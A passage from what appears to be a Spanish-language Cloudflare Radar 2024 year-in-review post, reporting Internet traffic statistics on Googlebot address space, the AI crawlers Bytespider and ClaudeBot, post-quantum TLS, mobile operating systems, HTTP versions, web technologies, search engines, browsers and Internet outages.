          </figure><p><i><sup>Curva de Hilbert que muestra el tráfico de 2024 en forma global hacia Cloudflare a través de Internet IPv4</sup></i></p><p>El sombreado naranja/rojo más cálido en la visualización representa las áreas de mayor volumen de solicitudes, y oculto en una de esas áreas está el bloque de direcciones IP que tuvo el máximo volumen de solicitudes a Cloudflare durante 2024. Al igual que en 2023, este bloque de direcciones era <a href="https://radar.cloudflare.com/routing/prefix/66.249.64.0/20"><u>66.249.64.0/20</u></a>, que pertenece a Google, y es <a href="https://developers.google.com/static/search/apis/ipranges/googlebot.json"><u>uno de tantos</u></a> utilizados por el rastreador web <a href="https://developers.google.com/search/docs/crawling-indexing/googlebot"><u>Googlebot</u></a> para obtener contenido para la indexación de búsqueda. El uso de ese espacio de direcciones es una explicación probable del alto volumen de solicitudes, debido a la cantidad de propiedades web en la red de Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/g5rQhT7r4DsgpzYdMT3QT/0d6809d96791ee7165ada170d24156e3/traffic_-_Hilbert_curve_Googlebot.png" />
          </figure><p><i><sup>Vista ampliada de la curva de Hilbert que muestra el bloque de direcciones IPv4 que generó el mayor volumen de solicitudes</sup></i></p><p>Además de Google, los propietarios de otros prefijos en los 20 principales incluyen Alibaba, Microsoft, Amazon y Apple. Para explorar Internet IPv4 en más detalle, te recomendamos que vayas al <a href="https://radar.cloudflare.com/year-in-review/2024/#ipv4-traffic-distribution"><u>micrositio del Resumen del Año</u></a> y lo explores arrastrando y haciendo zoom para moverte en el espacio de direcciones IPv4.</p>
    <div>
      <h3>Entre los bots y los rastreadores de IA, el tráfico de Bytespider (ByteDance) disminuyó gradualmente durante 2024, mientras que ClaudeBot (Anthropic) estuvo más activo durante la segunda mitad del año.</h3>
      <a href="#entre-los-bots-y-los-rastreadores-de-ia-el-trafico-de-bytespider-bytedance-disminuyo-gradualmente-durante-2024-mientras-que-claudebot-anthropic-estuvo-mas-activo-durante-la-segunda-mitad-del-ano">
        
      </a>
    </div>
    <p>Los bots y los rastreadores de IA han sido noticia durante 2024, ya que consumen contenido de manera voraz para entrenar modelos en constante evolución. Se ha generado una controversia, ya que no todos los bots y rastreadores respetan las directivas de los propietarios de contenido para restringir la actividad de rastreo. En julio, Cloudflare permitió a los clientes <a href="https://blog.cloudflare.com/declaring-your-aindependence-block-ai-bots-scrapers-and-crawlers-with-a-single-click/"><u>bloquear estos bots y rastreadores con solo un clic</u></a>, y durante la Semana aniversario <a href="https://blog.cloudflare.com/cloudflare-ai-audit-control-ai-content-crawlers/"><u>presentamos Auditoría de IA para</u></a> dar aún más visibilidad y control a los propietarios de sitios web sobre la manera en que las plataformas de IA acceden a su contenido. </p><p>El seguimiento de las tendencias de tráfico de los bots de IA nos ayuda a comprender mejor su actividad a lo largo del tiempo, y podemos observar cuáles son los más agresivos, cuáles tienen el mayor volumen de solicitudes, cuáles ejecutan rastreos de forma habitual, etc. El nuevo <a href="https://radar.cloudflare.com/traffic#ai-bot-crawler-traffic"><u>gráfico del tráfico de bots y rastreadores de IA en la página Traffic de Radar</u></a>, <a href="https://blog.cloudflare.com/bringing-ai-to-cloudflare/#ai-bot-traffic-insights-on-cloudflare-radar"><u>que se lanzó en septiembre</u></a>, brinda información sobre estas tendencias de tráfico recopiladas durante el periodo de tiempo seleccionado para los bots de IA más conocidos. </p><p><a href="https://radar.cloudflare.com/year-in-review/2024#ai-bot-and-crawler-traffic"><u>Si observamos las tendencias de tráfico</u></a> de dos de esos bots, podemos ver algunos patrones interesantes. <a href="https://darkvisitors.com/agents/bytespider"><u>Bytespider</u></a> es un rastreador operado por ByteDance, el propietario chino de TikTok, y, según se informa, se utiliza para descargar datos para entrenar los modelos lingüísticos de gran tamaño (LLM) de ByteDance. La actividad de rastreo de Bytespider en general tuvo una tendencia a la baja durante 2024, y a fines de noviembre la actividad fue aproximadamente un 80-85 % inferior a la que se había observado a principios de año. <a href="https://darkvisitors.com/agents/claudebot"><u>ClaudeBot</u></a> es el rastreador de Anthropic, que descarga datos para entrenar sus LLM que impulsan productos de IA como Claude. El tráfico de ClaudeBot parecía ser prácticamente inexistente hasta mediados de abril, salvo algunos pequeños picos que posiblemente representan ejecuciones de pruebas. El tráfico comenzó a aumentar a fines de abril, pero después de un pico inicial, disminuyó durante el resto del año.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7cm0SG0GC36Z3dFu3A6p3J/10a6e32a469984b2083ee0c2ed743d53/traffic_-_AI_bots_--_NEW.png" />
          </figure><p><i><sup>Tendencias de tráfico de los rastreadores de IA Bytespider y ClaudeBot en 2024</sup></i></p><p>Las tendencias de tráfico de la lista completa de bots y rastreadores de IA se pueden encontrar en <a href="https://radar.cloudflare.com/explorer?dataSet=ai.bots&amp;dt=2024-01-01_2024-12-31"><u>Cloudflare Radar Data Explorer</u></a>.</p>
    <div>
      <h3>El 13 % del tráfico TLS 1.3 está utilizando encriptación poscuántica.</h3>
      <a href="#el-13-del-trafico-tls-1-3-esta-utilizando-encriptacion-poscuantica">
        
      </a>
    </div>
    <p>El término "<a href="https://en.wikipedia.org/wiki/Post-quantum_cryptography"><u>poscuántico</u></a>" hace referencia a una nueva serie de técnicas de criptografía que están diseñadas para proteger los datos que tienen la capacidad de captar y almacenar los datos actuales para que sean descifrados por computadoras cuánticas lo suficientemente potentes en el futuro. El equipo de investigación de Cloudflare está <a href="https://blog.cloudflare.com/sidh-go/"><u>investigando la criptografía poscuántica desde 2017</u></a>.</p><p>En octubre de 2022, activamos el <a href="https://blog.cloudflare.com/post-quantum-for-all/"><u>acuerdo de claves poscuánticas</u></a> en nuestra red de manera predeterminada, pero para usarlo, los navegadores y los clientes también deben admitirlo. En 2024, <a href="https://developer.chrome.com/release-notes/124"><u>Chrome 124</u></a> de Google lo activó de manera predeterminada el 17 de abril, y la <a href="https://radar.cloudflare.com/year-in-review/2024#post-quantum-encryption"><u>adopción creció rápidamente tras el lanzamiento</u></a>, lo que aumentó el nivel de solicitudes desde un poco más de 2 % hasta un 12 % en un mes, y al finalizar noviembre ese porcentaje alcanzó un 13 %. Esperamos que la adopción siga creciendo en 2025 debido a la compatibilidad con otros navegadores de Chromium, la compatibilidad predeterminada cada vez mayor con Mozilla Firefox y las pruebas iniciales en Safari de Apple.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ipRtCowVftgad37ht9uMF/68958f72a47bbc179959c2d7ac6cdd72/traffic_-_post-quantum_worldwide.png" />
          </figure><p><i><sup>Tendencias de crecimiento en el tráfico TLS 1.3 cifrado poscuántico durante 2024</sup></i></p>
    <div>
      <h2>Información sobre adopción y uso</h2>
      <a href="#informacion-sobre-adopcion-y-uso">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/177RCO2sEvFJJeJeCBzZim/68acfcc309c57ef2027e9291a5f76d2f/2627_Shield.png" />
          </figure>
    <div>
      <h3>A nivel mundial, casi un tercio del tráfico de dispositivos móviles fue de Apple iOS. Android tuvo un porcentaje mayor del 90 % del tráfico de dispositivos móviles en 29 países/regiones; el porcentaje pico de tráfico de dispositivos móviles iOS fue de más del 60 %. en ocho países/regiones. </h3>
      <a href="#a-nivel-mundial-casi-un-tercio-del-trafico-de-dispositivos-moviles-fue-de-apple-ios-android-tuvo-un-porcentaje-mayor-del-90-del-trafico-de-dispositivos-moviles-en-29-paises-regiones-el-porcentaje-pico-de-trafico-de-dispositivos-moviles-ios-fue-de-mas-del-60-en-ocho-paises-regiones">
        
      </a>
    </div>
    <p>Los dos principales sistemas operativos para dispositivos móviles del mundo son <a href="https://en.wikipedia.org/wiki/IOS"><u>iOS de Apple</u></a> y <a href="https://en.wikipedia.org/wiki/Android_(operating_system)"><u>Android de Google</u></a>, y al analizar la información del <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent"><u>agente de usuario</u></a> notificado con cada solicitud, podemos obtener información sobre la distribución del tráfico por sistema operativo del cliente durante el año. Una vez más, descubrimos que Android genera la mayor parte del tráfico de dispositivos móviles a nivel mundial, debido a su amplia variedad de precios, formatos y funciones.</p><p>Al igual que en los <a href="https://radar.cloudflare.com/year-in-review/2023#ios-vs-android"><u>resultados de 2023</u></a>, Android volvió a <a href="https://radar.cloudflare.com/year-in-review/2024#ios-vs-android"><u>generar algo más de dos tercios del tráfico de dispositivos móviles</u></a>. Si observamos los principales países con tráfico de Android, encontramos un porcentaje de más del 95 % en <a href="https://radar.cloudflare.com/year-in-review/2024/sd#ios-vs-android"><u>Sudán</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/bd#ios-vs-android"><u>Bangladés</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/tm#ios-vs-android"><u>Turkmenistán</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/mw#ios-vs-android"><u>Malawi</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/pg#ios-vs-android"><u>Papúa Nueva Guinea</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/sy#ios-vs-android"><u>Siria</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2024/ye#ios-vs-android"><u>Yemen</u></a>, en 2023 solo eran dos países. Este año, al igual que el año pasado, también volvimos a observar que los países/las regiones donde más se usa Android se encuentran principalmente en África, Oceanía/Asia y Sudamérica, y que muchos tienen niveles más bajos de <a href="https://ourworldindata.org/grapher/gross-national-income-per-capita?tab=table"><u>ingresos nacionales brutos per cápita</u></a>. En estos países/regiones, la disponibilidad de dispositivos Android "de menor costo" tiene que ver con esa mayor adopción.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/9bsuRwzYBybYpOiKqwLja/cbdafb60eab1913a91ec916899d1e807/connectivity_-_mobile_desktop.png" />
          </figure><p><i><sup>Distribución global del tráfico de dispositivos móviles por sistema operativo en 2024</sup></i></p><p>En cambio, la adopción de iOS alcanza un máximo del 65 % en <a href="https://radar.cloudflare.com/year-in-review/2024/je#ios-vs-android"><u>Jersey</u></a>,<a href="https://radar.cloudflare.com/year-in-review/2024/fo#ios-vs-android"><u> Islas Feroe</u></a>,<a href="https://radar.cloudflare.com/year-in-review/2024/gg#ios-vs-android"><u> Guernsey</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2024/dk#ios-vs-android"><u>Dinamarca</u></a>. Se observaron tasas de adopción del 50 % o más en un total de 26 países/regiones, que incluyen <a href="https://radar.cloudflare.com/year-in-review/2024/no#ios-vs-android"><u>Noruega</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/se#ios-vs-android"><u>Suecia</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/au#ios-vs-android"><u>Australia</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/jp#ios-vs-android"><u>Japón</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/us#ios-vs-android"><u>Estados Unidos</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2024/ca#ios-vs-android"><u>Canadá</u></a>. Es probable que estos lugares tengan una mayor capacidad para comprar dispositivos de mayor precio, ya que el ingreso nacional bruto per cápita es comparativamente más alto.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/QCfjlx0TgEotwU2wPm0hE/af1359f249aec86894b681249fe7ee70/adoption_-_Android_iOS_top_5.png" />
          </figure><p><i><sup>Países/regiones con el mayor porcentaje de tráfico de iOS en 2024</sup></i></p>
    <div>
      <h3>A nivel global, casi la mitad de las solicitudes web utilizaron HTTP/2, y el 20,5 % utilizó HTTP/3.</h3>
      <a href="#a-nivel-global-casi-la-mitad-de-las-solicitudes-web-utilizaron-http-2-y-el-20-5-utilizo-http-3">
        
      </a>
    </div>
    <p>HTTP (protocolo de transferencia de hipertexto) es el protocolo principal en el que se basa la web . El <a href="https://datatracker.ietf.org/doc/html/rfc1945"><u>HTTP/1.0</u></a> se estandarizó por primera vez en 1996, el <a href="https://www.rfc-editor.org/rfc/rfc2616.html"><u>HTTP/1.1</u></a> en 1999 y el <a href="https://www.rfc-editor.org/rfc/rfc7540.html"><u>HTTP/2</u></a> en 2015. La versión más reciente, <a href="https://www.rfc-editor.org/rfc/rfc9114.html"><u>HTTP/3</u></a>, se completó en 2022 y se ejecuta sobre un nuevo protocolo de transporte que se conoce como <a href="https://blog.cloudflare.com/the-road-to-quic/"><u>QUIC</u></a>. Al ejecutarse sobre QUIC, el <a href="https://www.cloudflare.com/learning/performance/what-is-http3/"><u>HTTP/3</u></a> puede ofrecer un mejor rendimiento al mitigar los efectos de la pérdida de paquetes y los cambios de red, y al establecer conexiones más rápidas. El HTTP/3 también brinda encriptación predeterminada, lo que mitiga el riesgo de ataques. </p><p>Las versiones actuales de Google Chrome para computadoras y dispositivos móviles (y las variantes de Chromium), Mozilla Firefox y Safari de Apple <a href="https://caniuse.com/?search=http%2F3"><u>son compatibles con HTTP/3 de manera predeterminada</u></a>. Cloudflare ofrece HTTP/3 <a href="https://developers.cloudflare.com/speed/optimization/protocol/http3/"><u>de forma gratuita</u></a> a todos nuestros clientes, aunque no todos lo habilitan.</p><p>El análisis de la versión HTTP negociada para cada solicitud brinda información sobre la distribución del tráfico de las distintas versiones del protocolo en conjunto durante todo el año. (“HTTP/1.x” agrega las solicitudes que se hacen a través de HTTP/1.0 y HTTP/1.1.) A nivel <a href="https://radar.cloudflare.com/year-in-review/2024#http-versions"><u>global</u></a>, el 20,5 % de las solicitudes de 2024 se hicieron mediante HTTP/3. Otro 29,9 % de las solicitudes se hicieron a través del anterior HTTP/1.x mientras que HTTP/2 siguió dominando, y representó el 49,6 % restante.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/r7KQkjdsXXEtxHoEkFQbO/efb19d1bbd58bef3d657b96555d70103/adoption_-_HTTP_versions_global.png" />
          </figure><p><i><sup>Distribución global del tráfico por versión HTTP en 2024</sup></i></p><p>Si observamos la distribución de versiones por área geográfica, encontramos que ocho países/regiones envían más de un tercio de sus solicitudes a través de HTTP/3 y los cinco principales son <a href="https://radar.cloudflare.com/year-in-review/2024/re#http-versions"><u>Reunión</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/lk#http-versions"><u>Sri Lanka</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/mn#http-versions"><u>Mongolia</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/gr#http-versions"><u>Grecia</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2024/mk#http-versions"><u>Macedonia del Norte</u></a>. Otros ocho países/regiones, entre los que se incluyen <a href="https://radar.cloudflare.com/year-in-review/2024/ir#http-versions"><u>Irán</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/ie#http-versions"><u>Irlanda</u></a>, <a href="https://radar.cloudflare.com/year-in-review/2024/hk#http-versions"><u>Hong Kong</u></a> y <a href="https://radar.cloudflare.com/year-in-review/2024/cn#http-versions"><u>China</u></a>, enviaron más de la mitad de sus solicitudes a través de HTTP/1.x durante 2024. Más de la mitad de las solicitudes se hicieron a través de HTTP/2 en un total de 147 países/regiones.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Zq4mMgbvw6jT6pb6LLdF7/401b98731302233b6f9674e74196e819/adoption_-_HTTP_versions_top_5.png" />
          </figure><p><i><sup>Países/regiones con el mayor porcentaje de tráfico HTTP/3 en 2024</sup></i></p>
    <div>
      <h3>React, PHP y jQuery fueron algunas de las tecnologías más populares para crear sitios web, mientras que HubSpot, Google y WordPress se destacaron como proveedores líderes de servicios y plataformas de soporte. </h3>
      <a href="#react-php-y-jquery-fueron-algunas-de-las-tecnologias-mas-populares-para-crear-sitios-web-mientras-que-hubspot-google-y-wordpress-se-destacaron-como-proveedores-lideres-de-servicios-y-plataformas-de-soporte">
        
      </a>
    </div>
    <p>Los sitios web y las aplicaciones modernos son sumamente complejos, se desarrollan e integran en una combinación de marcos, plataformas, servicios y herramientas. Para ofrecer una experiencia de usuario eficiente, los desarrolladores deben verificar que todos estos componentes coexistan sin problemas entre sí. Con <a href="https://radar.cloudflare.com/scan"><u>URL Scanner de Cloudflare Radar</u></a>, volvimos a analizar los sitios web relacionados con los <a href="https://radar.cloudflare.com/domains"><u>5000 dominios principales</u></a> para identificar las <a href="https://radar.cloudflare.com/year-in-review/2024#website-technologies"><u>tecnologías y los servicios más populares</u></a> utilizados en una docena de categorías diferentes. </p><p>En cuanto a las principales tecnologías que se utilizaron para crear sitios web, <a href="https://react.dev/"><u>React</u></a> tuvo una ventaja dominante sobre <a href="https://vuejs.org/"><u>Vue.js</u></a> y otros marcos de JavaScript, <a href="https://www.php.net/"><u>PHP</u></a> fue la tecnología de programación más popular, y la participación de <a href="https://jquery.com/"><u>jQuery</u></a> fue 10 veces mayor que la de otras bibliotecas populares de JavaScript.</p><p>Los sitios web y las aplicaciones también utilizan servicios y plataformas de terceros para apoyar funciones como el análisis, la gestión de contenidos y la automatización del marketing. Google Analytics siguió siendo el proveedor de análisis más utilizado, WordPress tuvo un porcentaje de más del 50 % entre los sistemas de gestión de contenido, y para los proveedores de automatización de marketing, el líder de la categoría, HubSpot, tuvo casi el doble de porcentaje de uso que Marketo y MailChimp.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2fJS1OpqRlVCsZ9VOXdU89/c01320ff9d20da4ad2471de780a86033/adoption_-_top_website_technologies.png" />
          </figure><p><i><sup>Principales tecnologías de sitios web, categoría de marcos de JavaScript en 2024</sup></i></p>
    <div>
      <h3>Go superó a NodeJS como el lenguaje más popular para llamadas API automatizadas. </h3>
      <a href="#go-supero-a-nodejs-como-el-lenguaje-mas-popular-para-llamadas-api-automatizadas">
        
      </a>
    </div>
    <p>Muchos sitios web y aplicaciones dinámicos se basan en <a href="https://blog.cloudflare.com/2024-api-security-report/"><u>llamadas API automatizadas</u></a>, y podemos utilizar nuestra visibilidad exclusiva del tráfico web para identificar los principales lenguajes en los que están escritos estos clientes API . La aplicación de la heurística a las solicitudes relacionadas con la API que se determinaron que no provenían de una persona que estaba utilizando un navegador o una aplicación móvil nativa nos ayuda a identificar el lenguaje utilizado para crear el cliente API.</p><p><a href="https://radar.cloudflare.com/year-in-review/2024#api-client-language-popularity"><u>Nuestro análisis</u></a> reveló que casi el 12 % de las llamadas API automatizadas las hacen clientes de <a href="https://go.dev/"><u>Go,</u></a> y que <a href="https://nodejs.org/en/"><u>NodeJS</u></a>, <a href="https://www.python.org/"><u>Python</u></a>, <a href="https://www.java.com/"><u>Java</u></a><a href="https://dotnet.microsoft.com/"><u> y .NET</u></a> tienen porcentajes menores. Con respecto a <a href="https://radar.cloudflare.com/year-in-review/2023#api-client-language-popularity"><u>2023</u></a>, la participación de Go aumentó aproximadamente un 40 %, lo que le permitió alcanzar el primer puesto, mientras que el porcentaje de NodeJS cayó un poco más del 30 %. Python y Java también aumentaron sus porcentajes mientras que el de .NET disminuyó.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oq8vCSsDq57HNYCbEV59n/9373b727f7f7da45be317ba34d23dcab/adoption_-_api_client_languages.png" />
          </figure><p><i><sup>Lenguajes de clientes API más populares en 2024</sup></i></p>
    <div>
      <h3>Google es el motor de búsqueda más popular del mundo, en todas las plataformas. En cuanto a dispositivos móviles y sistemas operativos, Baidu está muy por detrás en segundo lugar. Bing está muy por detrás en segundo lugar entre los dispositivos de escritorio y de Windows, y DuckDuckGo ocupa el segundo lugar como más popular en macOS. </h3>
      <a href="#google-es-el-motor-de-busqueda-mas-popular-del-mundo-en-todas-las-plataformas-en-cuanto-a-dispositivos-moviles-y-sistemas-operativos-baidu-esta-muy-por-detras-en-segundo-lugar-bing-esta-muy-por-detras-en-segundo-lugar-entre-los-dispositivos-de-escritorio-y-de-windows-y-duckduckgo-ocupa-el-segundo-lugar-como-mas-popular-en-macos">
        
      </a>
    </div>
    <p>Al proteger y agilizar los sitios web y las aplicaciones de millones de clientes, Cloudflare se encuentra en una posición única para medir los datos de porcentajes de mercado de los motores de búsqueda. Nuestra metodología utiliza el <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer"><u>encabezado de referencia </u></a> de HTTP para identificar el motor de búsqueda que envía tráfico a los sitios y las aplicaciones de los clientes. Los datos del porcentaje de mercado se presentan en forma combinada, y también desglosados por tipo de dispositivo y sistema operativo. (Los datos del tipo de dispositivo y del sistema operativo provienen de los <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent"><u>agentes de usuario</u></a> y las <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Client_hints"><u>indicaciones del cliente</u></a> que acompañan a una solicitud de contenido).</p><p>A nivel <a href="https://radar.cloudflare.com/year-in-review/2024#search-engine-market-share"><u>global</u></a>, Google derivó la mayor parte del tráfico a los clientes de Cloudflare, con un porcentaje de más del 88 % en 2024. Yandex, Baidu, Bing y DuckDuckGo completan los cinco primeros puestos, todos con porcentajes de un solo dígito. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7bwTSu9NktZ9chotEmTQhs/fd231b3f13fe4709ca7480546276d2e0/adoption_-_search_engine_overall_worldwide.png" />
          </figure><p><i><sup>Porcentaje de mercado global de motores de búsqueda en 2024</sup></i></p><p>Sin embargo, al desglosar por ubicación o plataforma, las diferencias son evidentes en los principales motores de búsqueda y sus porcentajes. Por ejemplo, en <a href="https://radar.cloudflare.com/year-in-review/2024/kr#search-engine-market-share"><u>Corea del Sur</u></a>, Google genera solo dos tercios de las referencias, mientras que la plataforma local <a href="https://www.naver.com/"><u>Naver</u></a> impulsa el 29,2 %, y el portal local <a href="https://www.daum.net/"><u>Daum</u></a> también se encuentra entre los cinco primeros con un 1,3 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/rxOIPPwpJSt73X1GXH8t4/5597fd261ec7fda2cf357c70479be13f/adoption_-_search_engine_overall_South_Korea.png" />
          </figure><p><i><sup>Porcentaje de mercado de motores de búsqueda en Corea del Sur en 2024</sup></i></p><p>El predominio de Google también se ve algo mitigado en los dispositivos de Windows, donde solo genera el 80 % de las referencias a nivel mundial. Como era de esperar, Bing ocupa el segundo lugar para los usuarios de Windows, con un porcentaje del 10,4 %. Yandex, Yahoo y DuckDuckGo completan los primeros 5 puestos, todos ellos con porcentajes inferiores al 5 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4sKOs50fTPbchv55J7gQrM/1ce8b0c1287bbd5b35d9e987e2061207/adoption_-_search_engine_overall_worldwide_Windows.png" />
          </figure><p><i><sup>Porcentaje de mercado global de motores de búsqueda para dispositivos de Windows en 2024</sup></i></p><p>Para obtener más información, que incluye motores de búsqueda combinados en "Otros", consulta los <a href="https://radar.cloudflare.com/reports/search-engines"><u>informes trimestrales de referencia de motores de búsqueda </u></a>en Cloudflare Radar.</p>
    <div>
      <h3>Google Chrome es el navegador más popular en general. Si bien esto también es cierto en los dispositivos MacOS, el uso de Safari está muy por delante de Chrome en los dispositivos iOS. En Windows, Edge es el segundo navegador más popular. </h3>
      <a href="#google-chrome-es-el-navegador-mas-popular-en-general-si-bien-esto-tambien-es-cierto-en-los-dispositivos-macos-el-uso-de-safari-esta-muy-por-delante-de-chrome-en-los-dispositivos-ios-en-windows-edge-es-el-segundo-navegador-mas-popular">
        
      </a>
    </div>
    <p>Al igual que nuestra capacidad para medir el porcentaje de mercado de los motores de búsqueda, Cloudflare también se encuentra en una posición única para medir el porcentaje de mercado de los navegadores. Nuestra metodología utiliza información de los encabezados de los <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent"><u>agentes de usuario</u></a> y de las <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Client_hints"><u>indicaciones del cliente</u></a> para identificar el navegador que hace las solicitudes de contenido, junto con el sistema operativo relacionado. Los datos del porcentaje de mercado se presentan en forma combinada, y también desglosados por tipo de dispositivo y sistema operativo. Ten en cuenta que los porcentajes de navegadores disponibles tanto en computadoras de escritorio como en dispositivos móviles, como Chrome o Safari, se presentan de forma combinada.</p><p><a href="https://radar.cloudflare.com/year-in-review/2024#browser-market-share"><u>A nivel mundial</u></a>, descubrimos que el 65,8 % de las solicitudes procedían del navegador Chrome de Google en 2024, y que solo el 15,5 % procedían del navegador Safari de Apple. Microsoft Edge, Mozilla Firefox y el <a href="https://www.samsung.com/us/support/owners/app/samsung-internet"><u>navegador de Internet de Samsung</u></a> completaron los cinco primeros puestos, con porcentajes inferiores al 10 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1bEuEbqSrAqe57gnBTeL6c/4426dc0dbc8869d05344433535e0698a/adoption_-_browser_overall_worldwide.png" />
          </figure><p><i><sup>Porcentaje en el mercado global de navegadores web en 2024</sup></i></p><p>Al igual que en las estadísticas de los motores de búsqueda comentadas anteriormente, las diferencias son claramente visibles al desglosar por ubicación o plataforma. En algunos países donde iOS tiene un porcentaje de mercado mayor que Android, Chrome sigue siendo el navegador líder, pero por un margen mucho menor. Por ejemplo, en <a href="https://radar.cloudflare.com/year-in-review/2024/se#browser-market-share"><u>Suecia</u></a>, la participación de Chrome cayó al 56,2 %, mientras que la de Safari aumentó al 22,5 %. En <a href="https://radar.cloudflare.com/year-in-review/2024/no#browser-market-share"><u>Noruega</u></a>, Chrome cayó al 50 %, mientras que Safari creció al 25,6 %.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Dkt8A1HuUpg61G8GYkEXs/5c2649e96d2959a2606afa9d932d5b82/adoption_-_browser_overall_Norway.png" />
          </figure><p><i><sup>Participación en el mercado global de navegadores web en Noruega en 2024</sup></i></p><p>Como navegador predeterminado en los dispositivos con iOS, Safari de Apple fue el navegador más popular para dispositivos iOS, con una participación en el mercado del 81,7 % durante todo el año, mientras que Chrome solo alcanzó el 16,1 %. Y, a pesar de ser el navegador predeterminado que ya viene instalado en los dispositivos de Windows, Edge solo tuvo un porcentaje del 17,3 %, en comparación con el 68,5 % de Chrome.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Hvnf7VPBuVTjba0P1bGRU/6d6e31c609a54c8248afe120576210aa/adoption_-_browser_overall_worldwide_iOS.png" />
          </figure><p><i><sup>Porcentaje en el mercado global de navegadores web para dispositivos iOS en 2024</sup></i></p><p>Para obtener más información, incluidos los navegadores agrupados en "Otros", consulta los <u>informes trimestrales de porcentaje del mercado de los navegadores</u> en Cloudflare Radar.</p>
    <div>
      <h2>Conectividad</h2>
      <a href="#conectividad">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7xC8lBdDHpahlvkJrf1nI9/7b050dc62c1628e3a5ab3a9418e572d3/2627_Rocket.png" />
          </figure>
    <div>
      <h3>Hubo 225 interrupciones grandes del servicio de Internet en todo el mundo en 2024, y muchas de ellas se debieron a interrupciones a nivel nacional y regional dirigidas por gobiernos.</h3>
      <a href="#hubo-225-interrupciones-grandes-del-servicio-de-internet-en-todo-el-mundo-en-2024-y-muchas-de-ellas-se-debieron-a-interrupciones-a-nivel-nacional-y-regional-dirigidas-por-gobiernos">
        
      </a>
    </div>
    <p>Durante 2024, al igual que en los últimos años, hemos escrito con frecuencia sobre las interrupciones de Internet que observamos, ya sea debido a <a href="https://blog.cloudflare.com/east-african-internet-connectivity-again-impacted-by-submarine-cable-cuts"><u>cortes de cable</u></a>, <a href="https://blog.cloudflare.com/impact-of-verizons-september-30-outage-on-internet-traffic/"><u>problemas técnicos no especificados</u></a>, <a href="https://blog.cloudflare.com/syria-iraq-algeria-exam-internet-shutdown"><u>cortes ordenados por el gobierno</u></a> o una serie de otras razones que tratamos en nuestras publicaciones trimestrales (<a href="https://blog.cloudflare.com/q1-2024-internet-disruption-summary"><u>T1</u></a>, <a href="https://blog.cloudflare.com/q2-2024-internet-disruption-summary"><u>T2</u></a>, <a href="https://blog.cloudflare.com/q3-2024-internet-disruption-summary"><u>T3</u></a>). Los impactos de estas interrupciones pueden ser significativos, como importantes pérdidas económicas y graves limitaciones en las comunicaciones. El <a href="https://radar.cloudflare.com/outage-center"><u>Cloudflare Radar Outage Center</u></a> hace un seguimiento de estas interrupciones de Internet y utiliza los datos de tráfico de Cloudflare para obtener información sobre su alcance y duración.</p><p>Algunas de las interrupciones que se observaron durante el año fueron breves, de solo unas horas, mientras que otras se prolongaron durante días o semanas. En la última categoría, una interrupción de Internet en <a href="https://blog.cloudflare.com/q3-2024-internet-disruption-summary/#haiti"><u>Haití</u></a> se prolongó durante ocho días en septiembre, porque los equipos de reparación no pudieron acceder a un cable submarino dañado debido a un conflicto comercial, mientras que los cortes de los proveedores de Internet móvil y fijo en <a href="https://blog.cloudflare.com/q3-2024-internet-disruption-summary/#bangladesh"><u>Bangladés</u></a> se prolongaron durante aproximadamente 10 días en Julio. En la primera categoría, <a href="https://blog.cloudflare.com/q3-2024-internet-disruption-summary/#iraqi-kurdistan"><u>Irak</u></a> experimentó con frecuencia interrupciones de Internet de varias horas en todo el país con el fin de evitar que los estudiantes se copiaran en los exámenes académicos, lo que explica la agrupación visible en la línea cronológica durante junio, julio, agosto y septiembre.</p><p>En la <a href="https://radar.cloudflare.com/year-in-review/2024#internet-outages"><u>línea cronológica</u></a> del micrositio del Resumen del Año, al pasar el cursor sobre un punto se mostrarán metadatos sobre esa interrupción, y al hacer clic en él se abrirá una página con información adicional. Debajo del mapa y de la línea cronológica, hemos agregado un gráfico de barras que muestra los motivos registrados que están relacionados con las interrupciones observadas. En 2024, más de 